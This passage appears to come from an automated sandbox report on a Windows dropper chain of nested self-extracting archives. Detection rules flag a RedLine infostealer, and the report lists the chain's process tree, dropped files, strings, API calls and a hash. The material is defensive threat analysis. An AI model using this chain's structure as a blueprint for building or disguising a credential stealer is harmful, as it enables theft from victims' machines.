                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002887000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4(
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                            Source: file.exe, 00000000.00000003.249301508.00000000044F6000.00000004.00000020.00020000.00000000.sdmp, fcC6215.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                            Source: file.exe, 00000000.00000003.249301508.00000000044F6000.00000004.00000020.00020000.00000000.sdmp, fcC6215.exe.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                            Source: bRz07Kk.exe, 00000006.00000002.370107810.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000036B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                            Source: gOk22TE.exe, 00000003.00000003.252780522.0000000004C09000.00000004.00000020.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000000.277000636.00000000001E2000.00000002.00000001.01000000.0000000A.sdmp, bRz07Kk.exe.3.drString found in binary or memory: https://api.ip.sb/ip
                            Source: bRz07Kk.exe, 00000006.00000002.370107810.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000036B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                            Source: bRz07Kk.exe, 00000006.00000002.370107810.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000036B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                            Source: bRz07Kk.exe, 00000006.00000002.370107810.0000000003810000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000035A4000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.000000000290B000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.00000000027ED000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.000000000388E000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.000000000287A000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.0000000003658000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002760000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.00000000026D4000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.000000000363B000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.0000000003753000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000036D5000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.000000000382D000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.0000000003736000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000036B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                            Source: bRz07Kk.exe, 00000006.00000002.370107810.00000000037D1000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.370107810.00000000036B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                            Source: bRz07Kk.exe, memory dumps (.sdmp) String found in binary or memory: https://search.yahoo.com/favicon.ico https://search.yahoo.com/search
                            Source: bRz07Kk.exe, memory dumps (.sdmp) String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                            Source: bRz07Kk.exe, memory dumps (.sdmp) String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                            Source: bRz07Kk.exe, memory dumps (.sdmp) String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                            Source: file.exe, 00000000.00000003.249301508.00000000044F6000.00000004.00000020.00020000.00000000.sdmp, fcC6215.exe.0.dr String found in binary or memory: https://www.digicert.com/CPS0
                            Source: bRz07Kk.exe, memory dumps (.sdmp) String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                            System Summary

                            Source: 3.3.gOk22TE.exe.4c0bc20.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 3.3.gOk22TE.exe.4c0bc20.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 6.0.bRz07Kk.exe.1e0000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe, type: DROPPED Matched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 3.3.gOk22TE.exe.4c0bc20.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 3.3.gOk22TE.exe.4c0bc20.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 6.0.bRz07Kk.exe.1e0000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe, type: DROPPED Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00051F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00051F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe Code function: 1_2_00021F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00021F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe Code function: 2_2_00101F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_00101F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe Code function: 3_2_010E1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,3_2_010E1F90
                            Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00053BA2 0_2_00053BA2
                            Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00055C9E 0_2_00055C9E
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe Code function: 1_2_00023BA2 1_2_00023BA2
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe Code function: 1_2_00025C9E 1_2_00025C9E
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe Code function: 2_2_00103BA2 2_2_00103BA2
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe Code function: 2_2_00105C9E 2_2_00105C9E
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe Code function: 3_2_010E3BA2 3_2_010E3BA2
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe Code function: 3_2_010E5C9E 3_2_010E5C9E
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe Code function: 6_2_00AEF7C8 6_2_00AEF7C8
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe Code function: 6_2_00AEF368 6_2_00AEF368
                            Source: file.exe Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 813096 bytes, 2 files, at 0x2c +A "gck46uD.exe" +A "fcC6215.exe", ID 1810, number 1, 31 datablocks, 0x1503 compression
                            Source: gck46uD.exe.0.dr Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 586422 bytes, 2 files, at 0x2c +A "gDR79xP.exe" +A "dEX81lT.exe", ID 1855, number 1, 25 datablocks, 0x1503 compression
                            Source: gDR79xP.exe.1.dr Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 395332 bytes, 2 files, at 0x2c +A "gOk22TE.exe" +A "ckg5133.exe", ID 1791, number 1, 17 datablocks, 0x1503 compression
                            Source: gOk22TE.exe.2.dr Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 50180 bytes, 2 files, at 0x2c +A "aWM14.exe" +A "bRz07Kk.exe", ID 1685, number 1, 6 datablocks, 0x1503 compression
                            Source: file.exe, 00000000.00000003.249301508.00000000044F6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                            Source: file.exe, 00000000.00000003.249301508.00000000044F6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMelatonin@ vs file.exe
                            Source: file.exe Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                            Source: C:\Users\user\Desktop\file.exe Section loaded: sfc.dll
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe Section loaded: sfc.dll
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe Section loaded: sfc.dll
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe Section loaded: sfc.dll
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe Section loaded: sfc.dll
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe Section loaded: sfc.dll
                            Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fcC6215.exe CEB59E6DDD127FCC56E7DCA136002B8552290A954C92DD565706C4DC472BAD17
                            Source: file.exe Virustotal: Detection: 56%
                            Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                            Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe Process created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe Process created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe
                            Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe Process created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe
                            Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                            Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                            Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\aWM14.exe.log
                            Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP
                            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@15/10@0/1
                            Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0005597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_0005597D
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe Code function: 4_2_00007FFBACE21B10 ChangeServiceConfigA,4_2_00007FFBACE21B10
                            Source: bRz07Kk.exe.3.dr, BrEx.cs Base64 encoded string:
                            Source: 6.0.bRz07Kk.exe.1e0000.0.unpack, BrEx.cs Base64 encoded string:
                            Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00054FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_00054FE0
                            Source: C:\Users\user\Desktop\file.exe Command line argument: Kernel32.dll 0_2_00052BFB
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe Command line argument: Kernel32.dll 1_2_00022BFB
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe Command line argument: Kernel32.dll 2_2_00102BFB
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe Command line argument: Kernel32.dll 3_2_010E2BFB
                            Source: C:\Users\user\Desktop\file.exe Automated click: OK
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe Automated click: OK
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe Automated click: OK
                            Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                            Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                            Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                            Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                            Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                            Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                            Source: Binary string: wextract.pdb source: file.exe, gDR79xP.exe.1.dr, gck46uD.exe.0.dr, gOk22TE.exe.2.dr
                            Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: gck46uD.exe, 00000001.00000003.250210360.00000000048F6000.00000004.00000020.00020000.00000000.sdmp, dEX81lT.exe.1.dr
                            Source: Binary string: wextract.pdbGCTL source: file.exe, gDR79xP.exe.1.dr, gck46uD.exe.0.dr, gOk22TE.exe.2.dr
                            Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: gOk22TE.exe, 00000003.00000003.252780522.0000000004C09000.00000004.00000020.00020000.00000000.sdmp, aWM14.exe, 00000004.00000000.253025851.0000000000F22000.00000002.00000001.01000000.00000007.sdmp, aWM14.exe.3.dr
                            Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0005724D push ecx; ret 0_2_00057260
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe Code function: 1_2_0002724D push ecx; ret 1_2_00027260
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe Code function: 2_2_0010724D push ecx; ret 2_2_00107260
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe Code function: 3_2_010E724D push ecx; ret 3_2_010E7260
                            Source: ckg5133.exe.2.dr Static PE information: section name: .wel
                            Source: ckg5133.exe.2.dr Static PE information: section name: .fozoba
                            Source: ckg5133.exe.2.dr Static PE information: section name: .kezokix
                            Source: ckg5133.exe.2.dr Static PE information: section name: .luwe
                            Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00052F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00052F1D
                            Source: aWM14.exe.3.dr Static PE information: real checksum: 0x0 should be: 0x2c23
                            Source: bRz07Kk.exe.3.dr Static PE information: real checksum: 0x0 should be: 0x32f4c
                            Source: fcC6215.exe.0.dr Static PE information: real checksum: 0x4e075 should be: 0x520d5
                            Source: dEX81lT.exe.1.dr Static PE information: real checksum: 0x0 should be: 0x465b0
                            Source: aWM14.exe.3.dr Static PE information: 0xE382D401 [Fri Dec 15 06:19:45 2090 UTC]
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe File created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\dEX81lT.exe
                            Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fcC6215.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe File created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ckg5133.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe File created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe
                            Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe File created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe
                            Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00051AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00051AE8
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe Code function: 1_2_00021AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_00021AE8
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe Code function: 2_2_00101AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,2_2_00101AE8
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe Code function: 3_2_010E1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,3_2_010E1AE8
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
